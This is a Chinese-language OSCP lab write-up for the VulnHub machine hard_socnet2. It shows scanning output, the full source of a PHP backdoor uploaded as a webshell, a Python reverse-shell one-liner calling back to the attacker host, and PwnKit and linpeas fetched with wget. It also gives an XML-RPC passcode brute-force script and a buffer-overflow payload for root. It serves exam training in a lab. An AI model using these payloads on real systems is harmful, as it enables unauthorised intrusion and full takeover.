坚持自律做最好的自己,每天一台,欢迎大家监督
1-环境搭建
靶机下载地址:
https://download.vulnhub.com/boredhackerblog/hard_socnet2.ova
kali镜像:
kali-linux-2024.2-virtualbox-amd64
虚拟机环境:
Oracle VM VirtualBox 7.0
网络:
kali和靶机都选“仅主机(Host-Only)网络”
先启动kali,再启动靶机,因为上一台靶机分的是104的ip,所以这次是105
kali的IP是192.168.56.101
靶机的IP是192.168.56.105
2-靶机实战
2-1-扫描枚举
端口扫描,命令参考OSCP | 信息收集章节的“6.3 主动信息收集”
sudo nmap -p 1-65535 192.168.56.105
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-16 20:54 EDT
Nmap scan report for 192.168.56.105
Host is up (0.000079s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8000/tcp open http-alt
MAC Address: 08:00:27:1C:9D:15 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 14.42 seconds
发现22、80、8000端口开放,服务枚举,命令参考OSCP | 信息收集章节的“6.3 主动信息收集”
sudo nmap -p22,80,8000 -sT -A 192.168.56.105
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-16 20:55 EDT
Nmap scan report for 192.168.56.105
Host is up (0.00036s latency).
PORT STATE SERVICE VERSION
open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
ssh-hostkey:
2048 e5:d3:4e:54:fe:66:3e:f3:b2:a5:4b:51:9f:5f:f9:c6 (RSA)
256 de:86:ef:76:93:63:74:83:00:b1:a3:b8:c2:4c:8f:58 (ECDSA)
256 b5:ec:f1:1e:9a:5a:5c:d7:02:3a:9e:1b:f7:c8:b4:53 (ED25519)
open http Apache httpd 2.4.29 ((Ubuntu))
Apache/2.4.29 (Ubuntu) :
http-cookie-flags:
/:
PHPSESSID:
httponly flag not set
Social Network :
open http BaseHTTPServer 0.3 (Python 2.7.15rc1)
BaseHTTP/0.3 Python/2.7.15rc1 :
Error response :
XMLRPC instance doesn't support introspection. :
MAC Address: 08:00:27:1C:9D:15 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.36 ms 192.168.56.105
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.63 seconds
22端口为SSH服务,版本是OpenSSH 7.6p1,搜索可利用漏洞无果
80和8000是web服务
目录猜解,无有效漏洞发现
gobuster dir -u http://192.168.56.105 -w /usr/share/wordlists/dirb/common.txt -t 5
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[//192.168.56.105 ] Url: http:
[ ] Method: GET
[5 ] Threads:
[ ] Wordlist: /usr/share/wordlists/dirb/common.txt
[404 ] Negative Status codes:
[3.6 ] User Agent: gobuster/
[10s ] Timeout:
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 293]
/.htaccess (Status: 403) [Size: 298]
/.htpasswd (Status: 403) [Size: 298]
/database (Status: 301) [Size: 319] [--> http://192.168.56.105/database/]
/data (Status: 301) [Size: 315] [--> http://192.168.56.105/data/]
/functions (Status: 301) [Size: 320] [--> http://192.168.56.105/functions/]
/images (Status: 301) [Size: 317] [--> http://192.168.56.105/images/]
/includes (Status: 301) [Size: 319] [--> http://192.168.56.105/includes/]
/index.php (Status: 200) [Size: 10609]
/resources (Status: 301) [Size: 320] [--> http://192.168.56.105/resources/]
/server-status (Status: 403) [Size: 302]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
8000端口目录猜解获报错,无有效利用信息
访问http://192.168.56.105发现有登录和注册页面,登录页面需要邮箱,无法获得邮箱信息,注册新账号进行登录尝
POST / HTTP/1.1
Host: 192.168.56.105
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 248
Origin: http://192.168.56.105
Connection: close
Referer: http://192.168.56.105/
Cookie: PHPSESSID=44ppo456mnncv9os7rsv723mop
Upgrade-Insecure-Requests: 1
userfirstname=test&userlastname=test&usernickname=test&userpass=test1234&userpassconfirm=test1234&useremail=test%40test.com&selectday=1&selectmonth=1&selectyear=1996&usergender=M&userhometown=test&userstatus=S&userabout=test®ister=Create+Account
2-2-漏洞利用
登录后发现可以发帖、上传头像,尝试上传php的webshell,两处都可以上传webshell,下面是发帖上传
POST /home.php HTTP/1.1
Host: 192.168.56.105
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------10620729983454150411412931893
Content-Length: 799
Origin: http://192.168.56.105
Connection: close
Referer: http://192.168.56.105/home.php
Cookie: PHPSESSID=44ppo456mnncv9os7rsv723mop
Upgrade-Insecure-Requests: 1
-----------------------------10620729983454150411412931893
Content-Disposition: form-data; name="caption"
test
-----------------------------10620729983454150411412931893
Content-Disposition: form-data; name="fileUpload"; filename="simple-backdoor.php"
Content-Type: application/x-php
<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
<!-- http://michaeldaw.org 2006 -->
-----------------------------10620729983454150411412931893
Content-Disposition: form-data; name="post"
Post
-----------------------------10620729983454150411412931893--
获得webshell执行命令
curl http://192.168.56.105/data/images/posts/9.php?cmd=ls
<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
<pre>4.png
5.png
6.png
9.php
</pre>
revshells.com生成python反弹shell的payload,使用webshell进行执行
http://192.168.56.105/data/images/posts/9.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.101",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
在卡kali的443端口获得反弹shell
nc -nvlp 443
listening on [any] 443 ...
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.105] 41786
id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
pwd
pwd
/var/www/html/data/images/posts
ls /home
ls /home
socnet
cd /home/socnet
cd /home/socnet
ls
ls
add_record monitor.py peda
3-权限提升
3-1-提权枚举
上传linpeas.sh运行,,命令参考“OSCP | Linux提权”章节的“17.1.3 自动枚举”
cd /tmp
wget http://192.168.56.101/linpeas.sh
chmod +x ./linpeas.sh
./linpeas.sh
发现提示[CVE-2021-4034] PwnKit,与之前靶机一样
3-2-提权利用
这里我使用的是[CVE-2021-4034] PwnKit(https://github.com/ly4k/PwnKit)
wget http://192.168.56.101/PwnKit
chmod +x ./PwnKit
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
通过这几天打靶机基本发现,一个投机取巧的方法就是使用PwnKit提权,基本是2021年之前的linux都可以提权成功,但是靶机里一般也会预埋一些其他提权路径,这台靶机的提权就很有趣,下面简要说明,有兴趣的小伙伴可以自行尝试
前面拿到shell后,发现home目录下有socnet用户目录,查看文件发现
$ ls
ls
add_record monitor.py peda
$ cat monitor.py
cat monitor.py
#my remote server management API
import SimpleXMLRPCServer
import subprocess
import random
debugging_pass = random.randint(1000,9999)
def runcmd(cmd):
results = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
output = results.stdout.read() + results.stderr.read()
return output
def cpu():
return runcmd("cat /proc/cpuinfo")
def mem():
return runcmd("free -m")
def disk():
return runcmd("df -h")
def net():
return runcmd("ip a")
def secure_cmd(cmd,passcode):
if passcode==debugging_pass:
return runcmd(cmd)
else:
return "Wrong passcode."
server = SimpleXMLRPCServer.SimpleXMLRPCServer(("0.0.0.0", 8000))
server.register_function(cpu)
server.register_function(mem)
server.register_function(disk)
server.register_function(net)
server.register_function(secure_cmd)
server.serve_forever()
$ ps aux |grep monitor.py
ps aux |grep monitor.py
socnet 754 0.0 0.0 4628 780 ? Ss 02:40 0:00 /bin/sh -c /usr/bin/python /home/socnet/monitor.py
socnet 770 0.0 1.3 43216 13508 ? S 02:40 0:01 /usr/bin/python /home/socnet/monitor.py
www-data 1791 0.0 0.1 11464 1040 pts/0 S+ 04:58 0:00 grep monitor.py
monitor.py可以以socnet权限执行系统命令但是,需要暴力破解passcode,执行命令成功后获得socnet权限
python的xmlrpc使用参考:https://docs.python.org/zh-cn/3/library/xmlrpc.html
import xmlrpc.client
payload = '''
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.101",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
'''
with xmlrpc.client.ServerProxy("http://192.168.56.105:8000/") as proxy:
for i in range(1000,10000):
res = str(proxy.secure_cmd(payload,i))
if not "Wrong" in res:
print(i)
print(res)
break
但其实意义不大,不用获得socnet权限,也是可以运行add_record的,通过gdb调试发现add_record存在缓冲区溢出,并且具备setuid, setgid功能,也就是说运行add_record执行命令就可以获得root权限
$ file ./add_record
file ./add_record
./add_record: setuid, setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=e3fa9a66b0b1e3281ae09b3fb1b7b82ff17972d8, not stripped
$
通过gdb调试发现缓冲区溢出,构建payload,再将payload作为输入给add_record就可以获得root权限的shell了
python -c "import struct; print('aan1n1n1n' + 'A'*62 + struct.pack('I', 0x08048676))" > /tmp/rootshell
cat /tmp/rootshell - | ./add_record
综上,提权有些难度,但不在OSCP考察范围之内,各位小伙伴可以自行实验参考
打靶方法有很多,大家多尝试多交流
如有好的靶机欢迎后台留言推荐
或者小伙伴有靶机实战笔记也可后台发我分享哈
坚持自律做最好的自己
原文始发于微信公众号(高级红队专家):OSCP实战靶机 | hard_socnet2
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论